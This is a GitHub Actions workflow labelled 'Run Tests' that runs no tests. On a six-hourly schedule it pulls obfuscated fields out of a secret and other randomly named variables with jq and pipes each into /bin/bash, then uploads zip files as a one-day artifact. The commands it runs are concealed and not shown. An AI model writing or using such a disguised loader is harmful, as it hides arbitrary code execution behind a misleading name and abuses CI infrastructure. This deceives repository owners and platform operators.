name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '4 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          szm0: ${{ secrets.szm0 }}
        run: |
          printf '%s' "$szm0" | jq -r .un078 | /bin/bash
          printf '%s' "$otb0" | jq -r .k444 | /bin/bash
          echo $kgdtt748 | jq -r .ne7 | /bin/bash
          echo $j69 | jq -r .gvs92 | /bin/bash
          echo $y053 | jq -r .l64579 | /bin/bash
          echo $jdfyr0 | jq -r .r3641 | /bin/bash
          printf '%s' "$yt82" | jq -r .qkp264 | /bin/bash
          printf '%s' "$suyu12282" | jq -r .huyye37 | /bin/bash
          echo $nzkg8 | jq -r .ymtuj0376 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: TQTry0p5
          path: "*.zip"
          retention-days: 1
